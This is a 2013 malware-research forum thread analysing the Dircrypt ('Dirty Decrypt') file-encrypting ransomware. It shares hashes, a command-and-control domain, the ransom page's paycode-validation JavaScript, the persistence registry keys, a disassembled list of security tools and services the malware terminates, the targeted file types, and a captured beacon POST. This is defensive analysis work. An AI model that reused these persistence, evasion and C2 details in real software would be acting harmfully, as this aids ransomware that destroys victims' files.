Win32/Dircrypt (File Encrypting Ransomware)

Forum for analysis and discussion about malware.

Dirty Alert Ransomware

Postby Cody Johnston » Thu Jul 04, 2013 8:18 pm

Hello,

Picked this one up from a customer PC today. Has disturbing images on the front (blocked of course).

Image

It encrypts all of the files and gives a message to run the "Dirty Decrypt.exe" (enclosed in the archive)

Image

Dirty Decrypt.exe

Image

VT: 3/47

https://www.virustotal.com/en/file/ac995a703e528e67cb41489dcaa57f2ef7cb3174990bf8b30f69dfaae8ea4e37/analysis/

MD5: 4bb6c6c3f1ad7c2fb6096f6156c1df9b

Dropper, Dirty Decrypt.exe, and Sample encrypted pdf file enclosed. I do not have the original pdf file unfortunately. Happy 4th of July! :mrgreen:
You do not have the required permissions to view the files attached to this post.
Cody Johnston
 
Posts: 157
Joined: Sun May 01, 2011 4:33 pm
Location: Los Angeles, CA
Reputation point: 69

Re: Dirty Alert Ransomware

Postby thisisu » Fri Jul 05, 2013 12:42 am

Autorun entries created and some code found in index.html

Code: Select all
   function Validation(paycode, system)
    {
      if(system == "psk")   {
               
         if(paycode.length != 16 || paycode.match("/^\d+$/")) return false;
         
         if (paycode.charAt(0) != "0") return false;

         for(var j = 0; j <= 9;j++)
            if (paycode.indexOf(RepeatSymbol(5, j)) != -1)  return false;
            
         if(paycode.match("1234567")) return false;
            
         return true;
         
      } else if (system == "moneypak") {
      
         if(paycode.length < 14 || paycode.length > 25 ||  paycode.match("/^\d+$/")) return false;
         
         for(var j = 0; j <= 9;j++)
            if (paycode.indexOf(RepeatSymbol(5, j)) != -1)  return false;

         if(paycode.match("1234567")) return false;
         
         return true;
      }
      
      return false;
   }   
You do not have the required permissions to view the files attached to this post.
User avatar
thisisu
 
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Reputation point: 65

Re: Dirty Alert Ransomware

Postby Fabian Wosar » Sun Jul 07, 2013 9:39 pm

You can find the unpacked sample attached. C&C server appears to be pdstriker.com. The communication protocol appears to be protected using RSA. The public keys used for the communication can be found inside the resources, together with the C&C server as well as a whole bunch of different files containing the ransom note in various formats that the malware overwrites encrypted files with.

Files seem to be encrypted with RSA as well, which means decryption without the private key is not feasible. Don't quote me on that just yet though. I am kind of tired and only had a few minutes to look at the file. Will take a closer look tomorrow.
You do not have the required permissions to view the files attached to this post.
Best regards,

Fabian Wosar [Development]
Emsisoft Team - www.emsisoft.com
Fabian Wosar
 
Posts: 88
Joined: Thu Aug 26, 2010 8:23 am
Location: Germany
Reputation point: 102

Win32/Dircrypt (File Encrypting Ransomware)

Postby EP_X0FF » Wed Jul 24, 2013 5:31 am

Used CryptoAPI, WOW64 compatible (can handle FS redirection), seems client-server rsa key decryption scheme.
Aware of certain applications process names and attempt to terminate them in usual way.
Autoruns through usual entries: Software\Microsoft\Windows\CurrentVersion\Run, Software\Microsoft\Windows NT\CurrentVersion\Winlogon (UserInit value) and autorun Start menu folder

Code: Select all
.data:0041B434                                         ; "wscsvc"
.data:0041B438                 dd offset aWindefend    ; "WinDefend"
.data:0041B43C                 dd offset aWuauserv     ; "wuauserv"
.data:0041B440                 dd offset aMpssvc       ; "MpsSvc"
.data:0041B448                                         ; "taskmgr"
.data:0041B44C                 dd offset aFilemon      ; "filemon"
.data:0041B450                 dd offset aTcpview      ; "tcpview"
.data:0041B454                 dd offset aFilemon_0    ; "filemon"
.data:0041B458                 dd offset aProcexp      ; "procexp"
.data:0041B45C                 dd offset aProcmon      ; "procmon"
.data:0041B460                 dd offset aRegmon       ; "regmon"
.data:0041B464                 dd offset aWireshark    ; "wireshark"
.data:0041B468                 dd offset aLordpe       ; "LordPE"
.data:0041B46C                 dd offset aRegedit      ; "regedit"


Targets following file extensions:

Code: Select all
.jpg
.jpeg
.png
.doc
.rtf
.zip
.7z
.pdf
.docx
.docm
.xls
.xlsx
.xlsm
.rar
.avi
.mpeg
.mpg
.wmv


Example of "call home":

Code: Select all
POST / HTTP/1.1
Host: viweabkkfe.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
Content-Type: multipart/form-data; boundary=AIXvIEELixblffGFsogn
Content-Length: 261
Accept-Language: en-us
Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\*;q=0.1
Accept-Charset: utf-8, utf-16;q=0.6, *;q=0.1
Pragma: no-cache
Connection: close

--removed
Content-Disposition: form-data; name="cmd"

ld
--removed
Content-Disposition: form-data; name="botid"

removed
--removed
Content-Disposition: form-data; name="lid"

0
--removed--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Jul 2013 GMT
Content-Type: application/octet-stream
Content-Length: 191
Connection: close
X-Powered-By: PHP/5.3.25
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 24 Jul 2013 GMT
Cache-Control: max-age=0
Pragma: no-cache

f~Б*;F
ж–КУњЂвѕjjЙ(tТ=Ґ»*А¤‹3Emпq‚tKЙ ^CЯcїє”ФґФQ:jћ-‚ќоNА^ѓ\щЋ™u¦љєboиoЯџСМЦ•wз:`”џVПiЫ№Р%Є‚є?©‘я¤€•ҐХ9Ы 0©RчЫ:“”•Њ
T’6­У\h¬ЛЎ1i%нѕ3Ц1ЯП'#W4gn0vxвЈСЃ   FґтшГxL;ъ“ЧH‚


In attach:
1) original dropper
2) decrypted dropper (note additional tiny trojan downloader in the overlay)
3) extracted additional resources including ransomware pictures and second trojan - notificator

Always use backups.

VT
original
https://www.virustotal.com/en/file/e908284c087983e3b9f3a3b828f1a3812bfe0e77694b9ef943c0e5c90eb747bb/analysis/

deobfuscated
https://www.virustotal.com/en/file/9c67320f0a29796abfb5b53ef2fa2fbcb56b33cff6cdb3f96a8d303685e17263/analysis/
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Fabian Wosar » Wed Jul 24, 2013 7:21 am

An earlier variant of this particular malware was already uploaded here:
viewtopic.php?f=16&t=2822

Nothing else to add really, as your observations are pretty much identical with what I saw back then.
Best regards,

Fabian Wosar [Development]
Emsisoft Team - www.emsisoft.com
Fabian Wosar
 
Posts: 88
Joined: Thu Aug 26, 2010 8:23 am
Location: Germany
Reputation point: 102

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby EP_X0FF » Wed Jul 24, 2013 7:57 am

Thanks, threads merged.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Blaze » Fri Aug 09, 2013 9:51 am

New(er) variant on this one? Locks all files (PDF, DOC, JPG, ...) as usual and displays a message when trying to open the file.
Image

Found some info on Malekal's forum: http://forum.malekal.com/decrypter-fich ... ml#p348572
The encrypting algorithm in the program is quite tricky it stores key used for files encryption in encrypted way. And the key can be decrypted back only at the server side in case if user has already paid.
Encryption algorithm RC4 + RSA1024 can't be cracked.


DirtyDecrypt.exe itself was not present on the system anymore(?). Also, registry files were dropped to C:\Programdata but these were already deleted by the user as well. These probably contain encryption algorithms for different filetypes.

Attached is a sample, Microsoft detects as: Trojan:Win32/Dircrypt.A. Unsure how the malware entered, very likely through EK which loaded Java exploit. I will attached the spl0its found on that system in the correct topic: http://kernelmode.info/forum/viewtopic.php?f=16&t=1819

According to Kaspersky (quote above) it's encrypted with RC4 + RSA1024 so I don't have my hopes up high to help the user in this case. System restore does not solve the issue. Tried some ransomware decryptors, but since they're for specific malware families, they were not able to solve the issue either. I'm now trying to recover the files with PhotoRec.

Any help and/or insight on this issue is appreciated. Dropper attached. MD5: 7a3c8d7f8b2b5bd26995dd33f4c1ee3c
You do not have the required permissions to view the files attached to this post.
Follow me on Twitter: @bartblaze
User avatar
Blaze
 
Posts: 198
Joined: Fri Aug 27, 2010 7:35 am
Reputation point: 71

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Artilllerie » Fri Aug 09, 2013 1:28 pm

Hello,

Maybe some usefull tips :

1- DirtyDecrypt.exe is packed with UPX.

2- Confirm to use RSA :
Image

3- Use a specific user-agent :
Image

4- Bot ID reference here (and others parts) :
Image

5- Just type 14 char for Moneypack test :
Image

Show "Connection error" but no packet sniffed on my side.

All for the quick first look.
User avatar
Artilllerie
 
Posts: 25
Joined: Thu Dec 13, 2012 11:32 am
Reputation point: 3

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Blaze » Mon Aug 12, 2013 9:43 am

Thanks Artilllerie for this quick glance! Have you been able to study this one further?
Follow me on Twitter: @bartblaze
User avatar
Blaze
 
Posts: 198
Joined: Fri Aug 27, 2010 7:35 am
Reputation point: 71

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Artilllerie » Thu Aug 29, 2013 10:21 am

Sorry for the late answer Blaze !

Nothing new about It for me but I think there is not very much to study I'm agree with Kasper the key is generated and stored on server side and without it we cannot decrypt datas.

If I find something new I will keep you posted !
User avatar
Artilllerie
 
Posts: 25
Joined: Thu Dec 13, 2012 11:32 am
Reputation point: 3

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 10 guests